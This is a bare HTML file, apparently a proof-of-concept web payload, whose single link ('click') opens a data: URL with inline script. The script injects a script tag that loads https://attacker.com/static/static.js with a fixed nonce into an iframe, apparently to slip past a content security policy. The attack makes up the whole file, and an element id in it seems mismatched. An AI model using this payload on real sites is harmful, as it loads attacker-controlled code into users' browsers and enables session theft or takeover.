<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<a id="a1" target="_blank" href="data:text/html,<iframe id=a1 src=about:blank><\/iframe><script>GGGyUCznGGG.onload=_=>GGGyUCznGGG.contentDocument.body.innerHTML+='<script src=https://attacker.com/static/static.js nonce=123><\\/script>';GGGyUCznGGG.contentWindow.location.reload();<\/script>">click</a>
</body>
</html>